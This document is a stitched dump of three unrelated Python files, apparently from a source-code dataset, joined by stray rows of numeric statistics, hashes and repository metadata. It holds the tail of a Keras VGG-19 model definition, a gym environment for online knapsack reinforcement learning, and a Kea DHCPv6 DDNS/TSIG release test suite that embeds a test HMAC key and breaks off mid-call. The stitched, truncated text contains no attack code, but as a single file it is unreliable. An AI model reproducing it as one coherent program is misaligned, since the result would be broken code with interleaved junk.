vgg_block_2 = self.get_VGG_block(vgg_block_1, 256, 4)
vgg_block_2 = self.make_dropout_layer(vgg_block_2)
vgg_block_3 = self.get_VGG_block(vgg_block_2, 512, 4)
vgg_block_3 = self.make_dropout_layer(vgg_block_3)
vgg_block_4 = self.get_VGG_block(vgg_block_3, 512, 4)
stride_size = self.get_corrected_stride_size(vgg_block_4, [2, 2], [2, 2])
pooling_1 = MaxPooling2D(pool_size=[2, 2], strides=stride_size, padding="valid",)(
vgg_block_4
)
flatten_1 = Flatten()(pooling_1)
flatten_1 = self.make_dropout_layer(flatten_1)
dense_1 = Dense(4096, activation="relu")(flatten_1)
dense_2 = Dense(4096, activation="relu")(dense_1)
predictions = self.outputs(dense_2)
model = Model(inputs=self.inputs, outputs=predictions)
return model
class VGG_19_3D(VGG):
dims = 3
def create_model(self):
self.init_dimensionality(self.dims)
self.check_minimum_input_size(self.inputs, [24, 24, 24])
conv_1 = Conv3D(
filters=64, kernel_size=[3, 3, 3], strides=[1, 1, 1], padding="same", activation="relu",
)(self.inputs)
conv_2 = Conv3D(
filters=64, kernel_size=[3, 3, 3], strides=[1, 1, 1], padding="same", activation="relu",
)(conv_1)
vgg_block_1 = self.get_VGG_block(conv_2, 128, 2)
vgg_block_1 = self.make_dropout_layer(vgg_block_1)
vgg_block_2 = self.get_VGG_block(vgg_block_1, 256, 4)
vgg_block_2 = self.make_dropout_layer(vgg_block_2)
vgg_block_3 = self.get_VGG_block(vgg_block_2, 512, 4)
vgg_block_3 = self.make_dropout_layer(vgg_block_3)
vgg_block_4 = self.get_VGG_block(vgg_block_3, 512, 4)
stride_size = self.get_corrected_stride_size(vgg_block_4, [2, 2, 2], [2, 2, 2])
pooling_1 = MaxPooling3D(pool_size=[2, 2, 2], strides=stride_size, padding="valid",)(
vgg_block_4
)
flatten_1 = Flatten()(pooling_1)
flatten_1 = self.make_dropout_layer(flatten_1)
dense_1 = Dense(4096, activation="relu")(flatten_1)
dense_2 = Dense(4096, activation="relu")(dense_1)
predictions = self.outputs(dense_2)
model = Model(inputs=self.inputs, outputs=predictions)
return model
| 36.945
| 100
| 0.638923
| 1,044
| 7,389
| 4.205939
| 0.070881
| 0.140287
| 0.042587
| 0.054657
| 0.882259
| 0.818948
| 0.818948
| 0.810749
| 0.810749
| 0.810749
| 0
| 0.065756
| 0.246718
| 7,389
| 199
| 101
| 37.130653
| 0.723141
| 0
| 0
| 0.769231
| 0
| 0
| 0.018541
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.057692
| 0
| 0.185897
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40ad88d876c0782fe2302ed58a80759d32cba1b1
| 18,433
|
py
|
Python
|
reinforcement_learning/rl_knapsack_coach_custom/src/knapsack_env.py
|
jpmarques19/tensorflwo-test
|
0ff8b06e0415075c7269820d080284a42595bb2e
|
[
"Apache-2.0"
] | 5
|
2019-01-19T23:53:35.000Z
|
2022-01-29T14:04:31.000Z
|
reinforcement_learning/rl_knapsack_coach_custom/src/knapsack_env.py
|
jpmarques19/tensorflwo-test
|
0ff8b06e0415075c7269820d080284a42595bb2e
|
[
"Apache-2.0"
] | 6
|
2020-01-28T23:08:49.000Z
|
2022-02-10T00:27:19.000Z
|
reinforcement_learning/rl_knapsack_coach_custom/src/knapsack_env.py
|
jpmarques19/tensorflwo-test
|
0ff8b06e0415075c7269820d080284a42595bb2e
|
[
"Apache-2.0"
] | 8
|
2020-12-14T15:49:24.000Z
|
2022-03-23T18:38:36.000Z
|
import gym
from gym import spaces
import numpy as np
import queue
import csv
from capacity import Capacity
from item import Item
from knapsack_baseline import get_knapsack_solution_simple
from knapsack_baseline import get_knapsack_solution_medium
from knapsack_baseline import get_knapsack_benchmark_sol_hard_greedy_heuristic
from knapsack_view_2D import KnapsackView2D
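# Gym environment for an online knapsack task: each step offers one item and the
# agent chooses to put it in the bag or throw it away, subject to weight capacity.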
class KnapSackEnv(gym.Env):
def render(self, mode="human"):
if self.knapsack_view is None:
self.knapsack_view = KnapsackView2D(bag_weight_capacity=self.bag_weight_capacity,
max_item_value=self.max_item_value)
return self.knapsack_view.update(mode=mode, selected_item_queue=self.selected_item_queue,
reward=self.total_reward, item=self.item,
bag_weight=self.bag_weight, bag_value=self.bag_value)
def __init__(self):
self.min_weight_capacity = Capacity.min_weight
self.max_weight_capacity = Capacity.max_weight
self.max_item_value = 100
self.drop_penalty = -10
self.time_horizon = 20
self.bag_weight = None
self.bag_weight_capacity = None
self.bag_value = None
self.time_remaining = None
self.item = None
self.items_list = []
self.selected_item_queue = None
self.total_reward = 0
self.episode_count = 0
self.knapsack_view = None
self.csv_file = 'knapsack_easy.csv'
# Note: can collapse capacity and sum of weights into one dimension and can remove sum of values
# state: capacity,
# sum of weights of items,
# sum of values of items,
# item weight,
# item value,
# time remaining,
self.observation_space = spaces.Box(low=np.array([self.min_weight_capacity, 0, 0, 0, 0, 0]),
high=np.array([self.max_weight_capacity, # bag capacity
self.max_weight_capacity, # sum of weights in bag
np.inf, # sum of values in bag
self.max_weight_capacity, # item weight
self.max_item_value, # item value
self.time_horizon, # time remaining
]), dtype=np.uint32)
# actions: 0 -> don't put the item in the bag,
# 1 -> put the item in the bag,
self.action_space = spaces.Discrete(2)
def reset(self):
if self.episode_count == 0:
self.create_baseline_csv()
self.bag_weight = 0
self.bag_value = 0
self.time_remaining = self.time_horizon
self.bag_weight_capacity = np.random.randint(self.min_weight_capacity, self.max_weight_capacity)
self.item = Item.get_random_item(max_weight=Capacity.max_weight, max_value=self.max_item_value)
self.items_list = [self.item]
initial_state = [self.bag_weight_capacity,
self.bag_weight,
self.bag_value,
self.item.weight,
self.item.value,
self.time_remaining,
]
self.selected_item_queue = queue.Queue()
self.total_reward = 0
self.episode_count += 1
self.knapsack_view = None
return initial_state
def step(self, action):
done = False
if action == Action.THROW: # don't put item in bag
reward = self.drop_penalty
elif action == Action.PUT: # put the item in bag
if self.bag_weight_capacity < self.bag_weight + self.item.weight:
# drop the item
reward = self.drop_penalty
else:
self.selected_item_queue.put(self.item)
self.bag_weight += self.item.weight
self.bag_value += self.item.value
reward = self.item.value
else:
raise ValueError("Invalid action {}".format(action))
self.total_reward += reward
self.time_remaining -= 1
if self.time_remaining == 0:
done = True
if done:
# get baseline results
weights = [x.weight for x in self.items_list]
values = [x.value for x in self.items_list]
result = get_knapsack_solution_simple(weights, values,
self.bag_weight_capacity, self.drop_penalty)
print("Baseline reward: ", result[0], "RL Reward: ", self.total_reward)
# Save it to file
with open(self.csv_file, 'a') as f:
writer = csv.writer(f)
writer.writerow([self.episode_count, self.total_reward, result[0]])
self.item = Item.get_random_item(max_weight=Capacity.max_weight, max_value=self.max_item_value)
self.items_list += [self.item]
state = [self.bag_weight_capacity,
self.bag_weight,
self.bag_value,
self.item.weight,
self.item.value,
self.time_remaining,
]
info = {}
return state, reward, done, info
def create_baseline_csv(self):
header = ["Episode", "RL Reward", "Baseline Reward"]
with open(self.csv_file, 'w') as f:
writer = csv.writer(f)
writer.writerow(header)
class KnapSackMediumEnv(KnapSackEnv):
def render(self, mode="human"):
if self.knapsack_view is None:
self.knapsack_view = KnapsackView2D(bag_weight_capacity=self.bag_weight_capacity,
max_item_value=self.max_item_value,
bag_volume_capacity=self.bag_volume_capacity)
return self.knapsack_view.update(mode=mode, selected_item_queue=self.selected_item_queue,
reward=self.total_reward, item=self.item,
bag_weight=self.bag_weight, bag_volume=self.bag_volume,
bag_value=self.bag_value)
def __init__(self):
super().__init__()
self.bag_volume = None
self.bag_volume_capacity = None
self.time_horizon = 50
self.csv_file = 'knapsack_medium.csv'
# Note: can collapse capacity and sum of weights into one dimension and can remove sum of values
# state: weight_capacity,
# volume_capacity,
# sum of volumes of items,
# sum of weights of items,
# sum of values of items,
# item weight,
# item volume,
# item value,
# time remaining,
self.observation_space = spaces.Box(low=np.array([Capacity.min_weight,
Capacity.min_volume,
0, 0, 0, 0, 0, 0, 0]),
high=np.array([Capacity.max_weight, # bag weight capacity
Capacity.max_volume, # bag volume capacity
Capacity.max_weight, # sum of weights in bag
Capacity.max_volume, # sum of volume in bag
np.inf, # sum of values in bag
Capacity.max_weight, # item weight
Capacity.max_volume, # item volume
self.max_item_value, # item value
self.time_horizon, # time remaining
]))
def reset(self):
if self.episode_count == 0:
self.create_baseline_csv()
self.bag_weight = 0
self.bag_volume = 0
self.bag_value = 0
self.time_remaining = self.time_horizon
self.bag_weight_capacity = np.random.randint(Capacity.min_weight, Capacity.max_weight)
self.bag_volume_capacity = np.random.randint(Capacity.min_volume, Capacity.max_volume)
self.item = Item.get_random_item(max_value=self.max_item_value, max_weight=Capacity.max_weight,
max_volume=Capacity.max_volume)
self.items_list = [self.item]
initial_state = [self.bag_weight_capacity,
self.bag_volume_capacity,
self.bag_weight,
self.bag_volume,
self.bag_value,
self.item.weight,
self.item.volume,
self.item.value,
self.time_remaining,
]
self.selected_item_queue = queue.Queue()
self.total_reward = 0
self.episode_count += 1
self.knapsack_view = None
return initial_state
def step(self, action):
done = False
if action == Action.THROW: # don't put item in bag
reward = self.drop_penalty
elif action == Action.PUT: # put the item in bag
if (self.bag_weight_capacity < self.bag_weight + self.item.weight) \
or (self.bag_volume_capacity < self.bag_volume + self.item.volume):
# drop the item
reward = self.drop_penalty
else:
self.selected_item_queue.put(self.item)
self.bag_weight += self.item.weight
self.bag_volume += self.item.volume
self.bag_value += self.item.value
reward = self.item.value
else:
raise ValueError("Invalid action {}".format(action))
self.total_reward += reward
self.time_remaining -= 1
if self.time_remaining == 0:
done = True
if done:
# get baseline results
if self.episode_count % 50 == 0:
weights = [x.weight for x in self.items_list]
volumes = [x.volume for x in self.items_list]
values = [x.value for x in self.items_list]
result = get_knapsack_solution_medium(weights, volumes, values,
self.bag_weight_capacity, self.bag_volume_capacity,
self.drop_penalty)
print("Baseline reward: ", result[0], "RL Reward: ", self.total_reward)
# Save it to file
with open(self.csv_file, 'a') as f:
writer = csv.writer(f)
writer.writerow([self.episode_count, self.total_reward, result[0]])
self.item = Item.get_random_item(max_value=self.max_item_value, max_weight=Capacity.max_weight,
max_volume=Capacity.max_volume)
self.items_list += [self.item]
state = [self.bag_weight_capacity,
self.bag_volume_capacity,
self.bag_weight,
self.bag_volume,
self.bag_value,
self.item.weight,
self.item.volume,
self.item.value,
self.time_remaining,
]
info = {}
return state, reward, done, info
class KnapSackHardEnv(KnapSackMediumEnv):
# items disappear from bag after item_stay_duration time steps
def __init__(self):
super().__init__()
self.time_horizon = 100
self.item_stay_duration = 5 # time steps
self.csv_file = 'knapsack_hard.csv'
def reset(self):
initial_state = super().reset()
return initial_state
def step(self, action):
dummy_item = Item(weight=0, volume=0, value=0)
done = False
if action == Action.THROW: # don't put item in bag
reward = self.drop_penalty
self.selected_item_queue.put(dummy_item)
elif action == Action.PUT: # put the item in bag
if (self.bag_weight_capacity < self.bag_weight + self.item.weight) \
or (self.bag_volume_capacity < self.bag_volume + self.item.volume):
# drop the item
reward = self.drop_penalty
self.selected_item_queue.put(dummy_item)
else:
self.selected_item_queue.put(self.item)
self.bag_weight += self.item.weight
self.bag_volume += self.item.volume
self.bag_value += self.item.value
reward = self.item.value
else:
raise ValueError("Invalid action {}".format(action))
self.total_reward += reward
self.time_remaining -= 1
if self.time_remaining == 0:
done = True
if self.time_remaining < (self.time_horizon - self.item_stay_duration):
# items disappear after stay duration
exit_item = self.selected_item_queue.get()
self.bag_weight -= exit_item.weight
self.bag_volume -= exit_item.volume
if done:
# get baseline results
if self.episode_count % 10 == 0:
weights = [x.weight for x in self.items_list]
volumes = [x.volume for x in self.items_list]
values = [x.value for x in self.items_list]
result = get_knapsack_benchmark_sol_hard_greedy_heuristic(
weights, volumes, values,
self.bag_weight_capacity, self.bag_volume_capacity,
self.drop_penalty, self.item_stay_duration)
print("Baseline reward: ", result[0], "RL Reward: ", self.total_reward)
# Save it to file
with open(self.csv_file, 'a') as f:
writer = csv.writer(f)
writer.writerow([self.episode_count, self.total_reward, result[0]])
self.item = Item.get_random_item(max_value=self.max_item_value, max_weight=Capacity.max_weight,
max_volume=Capacity.max_volume)
self.items_list += [self.item]
state = [self.bag_weight_capacity,
self.bag_volume_capacity,
self.bag_weight,
self.bag_volume,
self.bag_value,
self.item.weight,
self.item.volume,
self.item.value,
self.time_remaining,
]
info = {}
return state, reward, done, info
class KnapSackCommonEnv(KnapSackMediumEnv):
# items disappear from bag after item_stay_duration time steps
def __init__(self):
super().__init__()
self.time_horizon = 100
self.item_stay_duration = 5 # time steps
self.csv_file = 'knapsack_hard.csv'
def reset(self):
initial_state = super().reset()
return initial_state
def step(self, action):
dummy_item = Item(weight=0, volume=0, value=0)
done = False
if action == Action.THROW: # don't put item in bag
reward = self.drop_penalty
self.selected_item_queue.put(dummy_item)
elif action == Action.PUT: # put the item in bag
if (self.bag_weight_capacity < self.bag_weight + self.item.weight) \
or (self.bag_volume_capacity < self.bag_volume + self.item.volume):
# drop the item
reward = self.drop_penalty
self.selected_item_queue.put(dummy_item)
else:
self.selected_item_queue.put(self.item)
self.bag_weight += self.item.weight
self.bag_volume += self.item.volume
self.bag_value += self.item.value
reward = self.item.value
else:
raise ValueError("Invalid action {}".format(action))
self.total_reward += reward
self.time_remaining -= 1
if self.time_remaining == 0:
done = True
if self.time_remaining < (self.time_horizon - self.item_stay_duration):
# items disappear after stay duration
exit_item = self.selected_item_queue.get()
self.bag_weight -= exit_item.weight
self.bag_volume -= exit_item.volume
if done:
# get baseline results
if self.episode_count % 10 == 0:
weights = [x.weight for x in self.items_list]
volumes = [x.volume for x in self.items_list]
values = [x.value for x in self.items_list]
result = get_knapsack_benchmark_sol_hard_greedy_heuristic(
weights, volumes, values,
self.bag_weight_capacity, self.bag_volume_capacity,
self.drop_penalty, self.item_stay_duration)
print("Baseline reward: ", result[0], "RL Reward: ", self.total_reward)
# Save it to file
with open(self.csv_file, 'a') as f:
writer = csv.writer(f)
writer.writerow([self.episode_count, self.total_reward, result[0]])
self.item = Item.get_random_item(max_value=self.max_item_value, max_weight=Capacity.max_weight,
max_volume=Capacity.max_volume)
self.items_list += [self.item]
state = [self.bag_weight_capacity,
self.bag_volume_capacity,
self.bag_weight,
self.bag_volume,
self.bag_value,
self.item.weight,
self.item.volume,
self.item.value,
self.time_remaining,
]
info = {}
return state, reward, done, info
class Action:
THROW = 0
PUT = 1
| 40.871397
| 109
| 0.535995
| 2,043
| 18,433
| 4.603524
| 0.070485
| 0.061776
| 0.05529
| 0.042424
| 0.876236
| 0.858161
| 0.839979
| 0.822541
| 0.809357
| 0.800425
| 0
| 0.007441
| 0.387566
| 18,433
| 450
| 110
| 40.962222
| 0.825671
| 0.080237
| 0
| 0.793003
| 0
| 0
| 0.017522
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043732
| false
| 0
| 0.03207
| 0
| 0.125364
| 0.011662
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40b08a386e45a0ef0ae29a19efeec333eb7ea4b5
| 14,930
|
py
|
Python
|
tests/dhcpv6/ddns/test_ddns_tsig_release.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 22
|
2015-02-27T11:51:05.000Z
|
2022-02-28T12:39:29.000Z
|
tests/dhcpv6/ddns/test_ddns_tsig_release.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 16
|
2018-10-30T15:00:12.000Z
|
2019-01-11T17:55:13.000Z
|
tests/dhcpv6/ddns/test_ddns_tsig_release.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 11
|
2015-02-27T11:51:36.000Z
|
2021-03-30T08:33:54.000Z
|
"""DDNS without TSIG"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_msg
import misc
import srv_control
@pytest.mark.v6
@pytest.mark.ddns
@pytest.mark.kea_only
@pytest.mark.tsig
@pytest.mark.forward_reverse_remove
def test_ddns6_tsig_sha1_forw_and_rev_release():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8:1::/64', '2001:db8:1::50-2001:db8:1::50')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'six')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('six.example.com.', 'forge.sha1.key')
srv_control.add_reverse_ddns('1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.', 'forge.sha1.key')
srv_control.add_keys('forge.sha1.key', 'HMAC-SHA1', 'PN4xKZ/jDobCMlo4rpr70w==')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(3)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_save_option_count(1, 'IA_NA')
srv_msg.client_save_option_count(1, 'server-id')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'sth6.six.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(39)
srv_msg.response_check_option_content(39, 'flags', 'S')
srv_msg.response_check_option_content(39, 'fqdn', 'sth6.six.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '2001:db8:1::50')
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'sth6.six.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname',
'0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
@pytest.mark.v6
@pytest.mark.ddns
@pytest.mark.kea_only
@pytest.mark.tsig
@pytest.mark.forward_reverse_remove
def test_ddns6_tsig_forw_and_rev_release_notenabled():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8:1::/64', '2001:db8:1::50-2001:db8:1::50')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'six')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('six.example.com.', 'forge.sha1.key')
srv_control.add_reverse_ddns('1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.', 'forge.sha1.key')
srv_control.add_keys('forge.sha1.key', 'HMAC-SHA1', 'PN4xKZ/jDobCMlo4rpr70w==')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(3)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_save_option_count(1, 'IA_NA')
srv_msg.client_save_option_count(1, 'server-id')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'sth6.six.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(39)
srv_msg.response_check_option_content(39, 'flags', 'S')
srv_msg.response_check_option_content(39, 'fqdn', 'sth6.six.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '2001:db8:1::50')
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'sth6.six.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname',
'0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.')
misc.test_procedure()
srv_control.start_srv('DHCP', 'stopped')
misc.test_setup()
srv_control.config_srv_subnet('2001:db8:1::/64', '2001:db8:1::50-2001:db8:1::50')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', False)
srv_control.add_ddns_server_options('generated-prefix', 'six')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('six.example.com.', 'forge.sha1.key')
srv_control.add_reverse_ddns('1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.', 'forge.sha1.key')
srv_control.add_keys('forge.sha1.key', 'HMAC-SHA1', 'PN4xKZ/jDobCMlo4rpr70w==')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '2001:db8:1::50')
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'sth6.six.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname',
'0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.')
@pytest.mark.v6
@pytest.mark.ddns
@pytest.mark.kea_only
@pytest.mark.tsig
@pytest.mark.reverse_remove
def test_ddns6_tsig_sha1_rev_release():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8:1::/64', '2001:db8:1::50-2001:db8:1::50')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'six')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('six.example.com.', 'forge.sha1.key')
srv_control.add_reverse_ddns('1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.', 'forge.sha1.key')
srv_control.add_keys('forge.sha1.key', 'HMAC-SHA1', 'PN4xKZ/jDobCMlo4rpr70w==')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(3)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_save_option_count(1, 'IA_NA')
srv_msg.client_save_option_count(1, 'server-id')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'sth6.six.example.com.')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(39)
srv_msg.response_check_option_content(39, 'flags', 'S', expect_include=False)
srv_msg.response_check_option_content(39, 'flags', 'N', expect_include=False)
srv_msg.response_check_option_content(39, 'flags', 'O', expect_include=False)
srv_msg.response_check_option_content(39, 'fqdn', 'sth6.six.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'sth6.six.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname',
